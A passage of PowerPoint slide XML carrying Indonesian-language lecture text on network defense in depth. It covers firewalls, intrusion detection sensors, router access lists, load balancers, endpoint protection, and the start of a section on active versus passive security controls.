            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diposisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>preventif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejajar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merelay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada router internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diteruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona internal dan host. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Lalu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>korektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penolakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Sensor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada port mirrored switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektif</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>korektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall host, anti-virus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29698351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Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> versus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pasif</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
